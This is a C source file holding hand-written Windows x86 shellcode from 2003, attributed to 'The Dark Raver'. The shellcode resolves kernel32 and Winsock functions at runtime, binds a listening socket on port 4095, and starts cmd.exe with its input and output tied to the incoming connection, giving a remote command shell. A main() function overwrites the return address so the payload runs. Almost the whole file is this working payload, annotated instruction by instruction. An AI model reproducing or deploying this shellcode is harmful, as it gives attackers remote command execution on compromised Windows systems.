// The Dark Raver // 26/01/2003 // 554 bytes // BINDSHELL + CMD // - Port: 4095 // - Find API offsets // - With Nulls // - With ExitThread() char hell[]= // ---- Creacion del array de llamadas al API ---- // Inicializamos "\x55" /* push %ebp */ "\x89\xe5" /* mov %esp,%ebp */ "\x81\xec\x58\x02\x00\x00" /* sub $0x258,%esp */ // get_kernel_base: "\x64\xa1\x30\x00\x00\x00" /* mov %fs:0x30,%eax */ "\x8b\x40\x0c" /* mov 0xc(%eax),%eax */ "\x8b\x70\x1c" /* mov 0x1c(%eax),%esi */ "\xad" /* lods %ds:(%esi),%eax */ "\x8b\x40\x08" /* mov 0x8(%eax),%eax */ // kern_base in eax "\x50" /* push %eax */ // get_getprocaddress: "\x8b\xc8" /* mov %eax,%ecx */ "\x03\x40\x3c" /* add 0x3c(%eax),%eax */ "\x8b\x78\x78" /* mov 0x78(%eax),%edi */ "\x03\xf9" /* add %ecx,%edi */ "\x8b\x77\x20" /* mov 0x20(%edi),%esi */ "\x03\xf1" /* add %ecx,%esi */ "\x33\xd2" /* xor %edx,%edx */ "\x8b\x06" /* mov (%esi),%eax */ "\x03\xc1" /* add %ecx,%eax */ "\x81\x38\x47\x65\x74\x50" /* cmpl $0x50746547,(%eax) */ "\x75\x1e" /* jne +1e */ "\x81\x78\x04\x72\x6f\x63\x41" /* cmpl $0x41636f72,0x4(%eax) */ "\x75\x15" /* jne +15 */ "\x8b\x47\x24" /* mov 0x24(%edi),%eax */ "\x03\xc1" /* add %ecx,%eax */ "\x0f\xb7\x1c\x50" /* movzwl (%eax,%edx,2),%ebx */ "\x8b\x47\x1c" /* mov 0x1c(%edi),%eax */ "\x03\xc1" /* add %ecx,%eax */ "\x8b\x1c\x98" /* mov (%eax,%ebx,4),%ebx */ "\x01\xcb" /* add %ecx,%ebx */ "\xeb\x09" /* jmp +9 */ "\x83\xc6\x04" /* add $0x4,%esi */ "\x42" /* inc %edx */ "\x3b\x57\x18" /* cmp 0x18(%edi),%edx */ "\x75\xcd" /* jne -32 */ // getprocaddress in ebx "\x58" /* pop %eax */ "\x50" /* push %eax */ // push &"CreateProcessA" "\xe8\x0f\x00\x00\x00" /* call +13 */ "CreateProcessA\x00" /* command string */ "\x50" /* push %eax */ // CreateProcessA=GetProcAddress(kernel_base. "CreateProcessA") "\xff\xd3" // call *%ebx "\x89\x45\x04" /* mov %eax,0x04(%ebp) */ "\x58" /* pop %eax */ "\x50" /* push %eax */ // push &"ExitThread" "\xe8\x0b\x00\x00\x00" /* call +11 */ "ExitThread\x00" /* command string */ "\x50" /* push %eax */ // ExitThread=GetProcAddress(kernel_base. "ExitThread") "\xff\xd3" // call *%ebx "\x89\x45\x2C" /* mov %eax,0x2C(%ebp) */ "\x58" /* pop %eax */ // push &"LoadLibraryA" "\xe8\x0d\x00\x00\x00" /* call +13 */ "LoadLibraryA\x00" /* command string */ "\x50" /* push %eax */ // LoadLibraryA=GetProcAddress(kernel_base. "LoadLibraryA") "\xff\xd3" // call *%ebx // ws2_32.dll=LoadLibraryA("ws2_32.dll") // push &"ws2_32.dll" "\xe8\x0b\x00\x00\x00" /* call +12 */ "ws2_32.dll\x00" /* command string */ // call LoadLibraryA = 0x1C "\xff\xd0" /* call *%eax */ //"\x89\x45\x28" /* mov %eax,0x28(%ebp) */ "\x8b\xf0" /* mov %eax,%esi */ // push &"WSAStartup" "\xe8\x0b\x00\x00\x00" /* call +11 */ "WSAStartup\x00" /* command string */ "\x56" /* push %esi */ // WSAStartup=GetProcAddress(ws2_32.dll, "WSAStartup") "\xff\xd3" // call *%ebx "\x89\x45\x08" /* mov %eax,0x8(%ebp) */ // push &"WSASocketA" "\xe8\x0b\x00\x00\x00" /* call +11 */ "WSASocketA\x00" /* command string */ "\x56" /* push %esi */ // WSASocketA=GetProcAddress(ws2_32.dll, "WSASocketA") "\xff\xd3" // call *%ebx "\x89\x45\x0C" /* mov %eax,0xC(%ebp) */ // push &"bind" "\xe8\x05\x00\x00\x00" /* call +11 */ "bind\x00" /* command string */ "\x56" /* push %esi */ // bind=GetProcAddress(ws2_32.dll, "bind") "\xff\xd3" // call *%ebx "\x89\x45\x10" /* mov %eax,0x10(%ebp) */ // push &"listen" "\xe8\x07\x00\x00\x00" /* call +11 */ "listen\x00" /* command string */ "\x56" /* push %esi */ // listen=GetProcAddress(ws2_32.dll, "listen") "\xff\xd3" // call *%ebx "\x89\x45\x14" /* mov %eax,0x14(%ebp) */ // push &"accept" "\xe8\x07\x00\x00\x00" /* call +11 */ "accept\x00" /* command string */ "\x56" /* push %esi */ // accept=GetProcAddress(ws2_32.dll, "accept") "\xff\xd3" // call *%ebx "\x89\x45\x18" /* mov %eax,0x18(%ebp) */ // ----------------------------------------- // LoadLibraryA = 0x1C(%ebp) // GetProcAddress = 0x20(%ebp) // kernel_base = 0x24(%ebp) // ws2_32.dll = 0x28(%ebp) // ExitThread = 0x2C(%ebp) // CreateProcessA = 0x04(%ebp) // WSAStartup = 0x08(%ebp) // WSASocketA = 0x0C(%ebp) // bind = 0x10(%ebp) // listen = 0x14(%ebp) // accept = 0x18(%ebp) // ---- socket + bind + listen + accept ---- // x = 16; // &x = 0xfffffde4(%ebp) "\xc7\x85\xe4\xfd\xff\xff\x10\x00\x00\x00" /* movl $0x10,0xfffffde4(%ebp) */ // WSAStartup(257, &info); // &info = 0xfffffe68(%ebp) "\x8d\x85\x68\xfe\xff\xff" /* lea 0xfffffe68(%ebp),%eax */ "\x50" /* push %eax */ "\x68\x01\x01\x00\x00" /* push $0x101 */ // call WSAStartup = 0x08(%ebp) "\x8b\x45\x08" /* mov 0x08(%ebp),%eax */ "\xff\xd0" /* call *%eax */ // hDes=WSASocket(2, 1, 0, 0, 0, 0); "\x6a\x00" /* push $0x0 */ "\x6a\x00" /* push $0x0 */ "\x6a\x00" /* push $0x0 */ "\x6a\x00" /* push $0x0 */ "\x6a\x01" /* push $0x1 */ "\x6a\x02" /* push $0x2 */ // call WSASocket = 0x71A35A01 = 0x0C "\x8b\x45\x0C" /* mov 0x0C(%ebp),%eax */ "\xff\xd0" /* call *%eax */ // &hDes=0xfffffe60(%ebp) "\x89\x85\x60\xfe\xff\xff" /* mov %eax,0xfffffe60(%ebp) */ // serv_addr.sin_family = 2; // &serv_addr = 0xfffffde8(%ebp) "\x66\xc7\x85\xe8\xfd\xff\xff\x02\x00" /* movw $0x2,0xfffffde8(%ebp) */ // serv_addr.sin_port = 65295; "\x66\xc7\x85\xea\xfd\xff\xff\x0f\xff" /* movw $0xff0f,0xfffffdea(%ebp) */ // serv_addr.sin_addr.s_addr = 0; "\xc7\x85\xec\xfd\xff\xff\x00\x00\x00\x00" /* movl $0x0,0xfffffdec(%ebp) */ // hSock = bind(hDes, (struct sockaddr *)&serv_addr, 16); "\x6a\x10" /* push $0x10 */ "\x8d\x85\xe8\xfd\xff\xff" /* lea 0xfffffde8(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x85\x60\xfe\xff\xff" /* mov 0xfffffe60(%ebp),%eax */ "\x50" /* push %eax */ // call bind = 0x71A33ECE = 0x10 "\x8b\x45\x10" /* mov 0x10(%ebp),%eax */ "\xff\xd0" /* call *%eax */ // hSock = listen(hDes, 5); "\x6a\x05" /* push $0x5 */ "\x8b\x85\x60\xfe\xff\xff" /* mov 0xfffffe60(%ebp),%eax */ "\x50" /* push %eax */ // call listen = 0x71A35DE2 = 0x14 "\x8b\x45\x14" /* mov 0x14(%ebp),%eax */ "\xff\xd0" /* call *%eax */ // hSock = accept(hDes, (struct sockaddr *)&serv_addr, &x); "\x8d\x85\xe4\xfd\xff\xff" /* lea 0xfffffde4(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x85\xe8\xfd\xff\xff" /* lea 0xfffffde8(%ebp),%eax */ "\x50" /* push %eax */ "\x8b\x85\x60\xfe\xff\xff" /* mov 0xfffffe60(%ebp),%eax */ "\x50" /* push %eax */ // call accept = 0x71A3868D = 0x18 "\x8b\x45\x18" /* mov 0x18(%ebp),%eax */ "\xff\xd0" /* call *%eax */ // &hSock=0xfffffe64(%ebp) "\x89\x85\x64\xfe\xff\xff" /* mov %eax,0xfffffe64(%ebp) */ // ---- Lanzamiento de cmd.exe ---- // memset(&piProcInfo, 0, 16); // &piProcInfo=0xfffffe48(%ebp) "\x8d\xbd\x48\xfe\xff\xff" /* lea 0xfffffe48(%ebp),%edi */ "\xb0\x00" /* mov $0x0,%al */ "\xb9\x16\x00\x00\x00" /* mov $0x16,%ecx */ "\xf3\xaa" /* repz stos */ // memset(&siStartInfo, 0, 68); // &siStartInfo= 0xfffffdf8(%ebp) "\x8d\xbd\xf8\xfd\xff\xff" /* lea 0xfffffdf8(%ebp),%edi */ "\xb0\x00" /* mov $0x0,%al */ "\xb9\x68\x00\x00\x00" /* mov $0x68,%ecx */ "\xf3\xaa" /* repz stos */ //siStartInfo.dwFlags = 256 | 1; //siStartInfo.wShowWindow = 0; //siStartInfo.hStdOutput = hSock; //siStartInfo.hStdError = hSock; //siStartInfo.hStdInput = hSock; "\xc7\x85\x24\xfe\xff\xff\x01\x01\x00\x00" /* movl $0x101,0xfffffe24(%ebp) */ "\x66\xc7\x85\x28\xfe\xff\xff\x00\x00" /* movw $0x0,0xfffffe28(%ebp) */ "\x8b\x85\x64\xfe\xff\xff" /* mov 0xfffffe64(%ebp),%eax */ "\x89\x85\x34\xfe\xff\xff" /* mov %eax,0xfffffe34(%ebp) */ "\x89\x85\x38\xfe\xff\xff" /* mov %eax,0xfffffe38(%ebp) */ "\x89\x85\x30\xfe\xff\xff" /* mov %eax,0xfffffe30(%ebp) */ // CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &siStartInfo, &piProcInfo); "\x8d\x85\x48\xfe\xff\xff" /* lea 0xfffffe48(%ebp),%eax */ "\x50" /* push %eax */ "\x8d\x85\xf8\xfd\xff\xff" /* lea 0xfffffdf8(%ebp),%eax */ "\x50" /* push %eax */ "\x6a\x00" /* push $0x0 */ "\x6a\x00" /* push $0x0 */ "\x6a\x00" /* push $0x0 */ "\x6a\x01" /* push $0x1 */ "\x6a\x00" /* push $0x0 */ "\x6a\x00" /* push $0x0 */ // push &cmd.exe "\xe8\x08\x00\x00\x00" /* call +8 */ "cmd.exe\x00" /* command string */ "\x6a\x00" /* push $0x0 */ // call CreateProcessA = 0x04(%ebp) "\x8b\x45\x04" /* mov 0x04(%ebp),%eax */ "\xff\xd0" /* call *%eax */ // call ExitThread = 0x2C(%ebp) "\x8b\x45\x2C" /* mov 0x2C(%ebp),%eax */ "\xff\xd0" /* call *%eax */ ""; // TDR int main() { int *ret; printf("%d\n",sizeof(hell)); ret = (int *)&ret + 2; (*ret) = (int)hell; }